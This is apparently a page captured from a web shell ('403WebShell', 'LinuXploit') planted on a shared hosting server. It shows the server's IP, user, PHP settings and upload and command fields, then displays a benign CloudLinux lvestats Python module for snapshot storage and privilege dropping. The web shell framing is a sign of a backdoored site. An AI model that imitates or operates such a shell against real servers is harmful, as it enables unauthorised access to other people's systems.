Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 52.14.125.137
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/lvestats/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/lvestats/lib/snapshot.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
import json
import logging
import os
import pwd
import shutil
import sys
import zlib
from contextlib import contextmanager
from typing import List, Optional  # NOQA

# Root directory of the snapshot storage; Snapshot.get_dir() appends the user's uid to it
SNAPSHOT_PATH = '/var/lve/snapshots'
# Suffix of a snapshot dump file; the part of the name before it is the integer dump timestamp
SNAPSHOT_EXT = '.snapshot'
# Length of the suffix, precomputed for stripping it when a file name is parsed back to a timestamp
SNAPSHOT_EXT_LEN = len(SNAPSHOT_EXT)


class Snapshot(object):
    """
    Load and save snapshot files of one user for an incident interval.

    The files are saved as /var/lve/snapshots/[uid]/[dump_time].snapshot, where
    dump_time is an integer timestamp and the content is zlib-compressed JSON.
    The directory /var/lve/snapshots/[uid] is chowned to the user and the dump
    files are created under the user's effective uid with mode 0400, so they
    are not readable by other users.
    """

    def __init__(self, incident, compresslevel=1):
        # type: (dict, int) -> None
        """
        :param incident: incident description; ``uid`` is always required,
            ``incident_start_time``/``incident_end_time`` are read only by
            get_incident_snapshots()
        :param compresslevel: zlib compression level used when writing dumps
        """
        self.compresslevel = compresslevel
        self.incident = incident
        self.log = logging.getLogger('lib-snapshot')

    def save(self, data):
        # type: (dict) -> str
        """
        Dump ``data`` as compressed JSON into the file named after its dump time.

        ``data`` is modified in place: its ``snap_sql`` and ``snap_http``
        entries are replaced with lists whose bytes values are decoded to text
        (both keys are created when missing).

        :param data: snapshot content, must contain a non-None ``dump_time``
        :return: path of the written snapshot file
        """
        dump_date = data['dump_time']
        assert dump_date is not None

        # bytes are not JSON serializable, decode them to text first
        self._replace_unicode_data(data)
        json_compressed = zlib.compress(json.dumps(data).encode(), self.compresslevel)
        with self.create_file(dump_date) as f:
            f.write(json_compressed)
            self.log.debug('Snapshot dumped to file %s', f.name)
        return f.name

    @staticmethod
    def _to_unicode(obj):
        """
        Decode bytes as UTF-8 (undecodable bytes are replaced);
        any other object is returned unchanged.
        """
        if isinstance(obj, bytes):
            return obj.decode('utf-8', 'replace')
        return obj

    def _replace_unicode_data(self, data):
        # type: (dict) -> None
        """
        Replace ``snap_sql`` and ``snap_http`` in ``data`` with lists of lists
        in which every bytes item is decoded to text. Missing keys become [].
        """
        for key in ('snap_sql', 'snap_http'):
            data[key] = [list(map(self._to_unicode, row)) for row in data.get(key, [])]

    def get_file_list(self):
        # type: () -> List[str]
        """
        :return: names of all entries in the user's snapshot directory,
            or an empty list when the directory does not exist
        """
        dir_ = self.get_dir()
        if os.path.isdir(dir_):
            return os.listdir(dir_)
        return []

    def get_ts_list(self, from_ts, to_ts):
        # type: (Optional[int], Optional[int]) -> List[int]
        """
        Return ordered list of timestamps when snapshots for this user were created
        :param from_ts: lower bound (inclusive), None means no lower bound
        :param to_ts: upper bound (inclusive), None means no upper bound
        :return: list of timestamps, ordered for that period
        """
        return self.snapshot_filter(self.get_file_list(), from_ts, to_ts)

    def get_snapshots(self, from_ts, to_ts):
        # type: (Optional[int], Optional[int]) -> list
        """
        Get all snapshots for a period. Files that cannot be read or parsed
        are logged and skipped.
        :param from_ts: lower bound (inclusive), None means no lower bound
        :param to_ts: upper bound (inclusive), None means no upper bound
        :return: list of snapshots, ordered by date
        """
        result = []
        for ts in self.get_ts_list(from_ts, to_ts):
            filename = self.get_file_name(self.ts_to_name(ts))
            try:
                if not os.geteuid():
                    # running as root: read the file with the owner's privileges only
                    with drop_privileges(self.incident["uid"]):
                        content = self.read_file_content(filename)
                else:
                    content = self.read_file_content(filename)
                result.append(json.loads(content))
            except (IOError, ValueError, OSError) as ve:
                self.log.warning(
                    "Corrupted file: %s (%s)",
                    filename,
                    str(ve),
                )
        return result

    def read_file_content(self, filename):
        # type: (str) -> str
        """
        Read a snapshot file and return its decompressed content as text.

        A file that is not valid zlib data is treated as an uncompressed dump:
        its raw content is returned and the file is rewritten compressed.
        The rewrite is best effort - a failure (e.g. the file is read-only)
        is logged and does not prevent the content from being returned.

        :param filename: path of the snapshot file
        :return: decoded file content
        :raises OSError: when the file cannot be read
        :raises UnicodeDecodeError: when the content is not valid UTF-8
        """
        with open(filename, 'rb') as f:
            content = f.read()
        try:
            content = zlib.decompress(content)
        except zlib.error:
            compressed_content = zlib.compress(content, self.compresslevel)
            try:
                with open(filename, 'wb') as f:
                    f.write(compressed_content)
            except (IOError, OSError) as e:
                # the data is already in memory, so the read itself still succeeds
                self.log.warning('Unable to compress snapshot file %s (%s)', filename, str(e))
        return content.decode()

    def get_incident_snapshots(self):
        # type: () -> list
        """
        Load all snapshots for given incident
        :return: list of snapshots
        """
        return self.get_snapshots(self.incident["incident_start_time"], self.incident["incident_end_time"])

    def get_dir(self):
        # type: () -> str
        """
        :return: path of the snapshot directory of the incident's user
        """
        return os.path.join(SNAPSHOT_PATH, str(self.incident["uid"]))

    def get_file_name(self, name):
        # type: (str) -> str
        """
        :param name: file name inside the user's snapshot directory
        :return: full path of that file
        """
        return os.path.join(self.get_dir(), name)

    def create_file(self, dump_date):
        # type: (int) -> open()
        """
        create file, change its ownership & permissions if needed. Create directories if needed as well
        The file is opened with the effective uid of the incident's user; the caller has to close it.
        :param dump_date: int timestamp used as file name
        :return: open File object (binary, write mode)
        """
        dir_ = self.get_dir()
        if not os.path.exists(dir_):
            try:  # sacrifice security if we cannot setup ownership properly
                os.makedirs(dir_)
                os.chmod(dir_, 0o751)
                os.chown(dir_, self.incident["uid"], 0)
            except (IOError, OSError) as e:
                self.log.error('Unable to create dir %s (%s)', dir_, str(e))
        file_name = self.get_file_name(self.ts_to_name(dump_date))
        with drop_privileges(self.incident["uid"]):
            file_ = open(file_name, 'wb')  # pylint: disable=consider-using-with
            try:
                # owner read-only; the already open descriptor stays writable
                os.fchmod(file_.fileno(), 0o400)
            except (IOError, OSError) as e:
                self.log.error('Unable to set file permissions %s (%s)', file_name, str(e))
        return file_

    def delete_old(self, to_ts):
        # type: (int) -> None
        """
        Delete old snapshots. If there are no more snapshots left after that,
        the whole user directory is removed. Does nothing when the directory
        does not exist.
        :param to_ts: up to which timestamp to remove snapshots
        :return: None
        """
        _dir = self.get_dir()
        # get_file_list() returns [] for a missing directory instead of raising
        files = self.get_file_list()
        all_snapshots = self.snapshot_filter(files)
        ts_to_remove = self.snapshot_filter(files, to_ts=to_ts)
        if all_snapshots == ts_to_remove:
            shutil.rmtree(_dir, ignore_errors=True)
        else:
            for ts in ts_to_remove:
                os.remove(self.get_file_name(self.ts_to_name(ts)))

    @staticmethod
    def get_ts(file_):
        # type: (str) -> Optional[int]
        """
        Parse the timestamp out of a snapshot file name.
        :param file_: file name (without directory)
        :return: timestamp, or None if the name is not ``<digits>.snapshot``
        """
        if not file_.endswith(SNAPSHOT_EXT):
            return None
        ts = file_[0:-SNAPSHOT_EXT_LEN]
        if not ts.isdigit():
            return None
        try:
            return int(ts)
        except ValueError:
            # isdigit() accepts characters (e.g. superscript digits) that int() rejects
            return None

    @staticmethod
    def snapshot_filter(files, from_ts=None, to_ts=None):
        # type: (List[str], Optional[int], Optional[int]) -> List[int]
        """
        Select snapshot files whose timestamp lies in [from_ts, to_ts].
        :param files: file names to inspect; non-snapshot names are ignored
        :param from_ts: lower bound (inclusive), None means 0
        :param to_ts: upper bound (inclusive), None means sys.maxsize
        :return: sorted list of matching timestamps
        """
        if from_ts is None:
            from_ts = 0
        if to_ts is None:
            to_ts = sys.maxsize
        timestamps = (Snapshot.get_ts(filename) for filename in files)
        return sorted(ts for ts in timestamps if ts is not None and from_ts <= ts <= to_ts)

    @staticmethod
    def ts_to_name(ts):
        # type: (int) -> str
        """
        :param ts: dump timestamp
        :return: snapshot file name for that timestamp
        """
        return str(ts) + SNAPSHOT_EXT


@contextmanager
def drop_privileges(uid):
    """
    Context manager that temporarily switches the effective identity of the process.

    Inside the ``with`` body the process has no supplementary groups, the
    effective gid of the ``nobody`` account and the effective uid ``uid``.
    On exit the effective uid/gid are set back to the real uid/gid of the
    process and the supplementary groups that were active on entry are restored.

    :param uid: numeric user id to use as effective uid
    :raises KeyError: when there is no ``nobody`` entry in the password database
    :raises OSError: when the process is not allowed to change its identity
    """
    old_uid, old_gid, old_groups = os.getuid(), os.getgid(), os.getgroups()
    gid = pwd.getpwnam('nobody')[3]
    # if this call fails nothing has been changed yet, so it stays outside the try
    os.setgroups([])
    try:
        # kept inside the try so that a failure here still rolls back the
        # changes that were already applied
        os.setegid(gid)
        os.seteuid(uid)
        yield
    finally:
        # the uid has to be restored first: changing gid/groups needs privileges
        os.seteuid(old_uid)
        os.setegid(old_gid)
        os.setgroups(old_groups)

Youez - 2016 - github.com/yon3zu
LinuXploit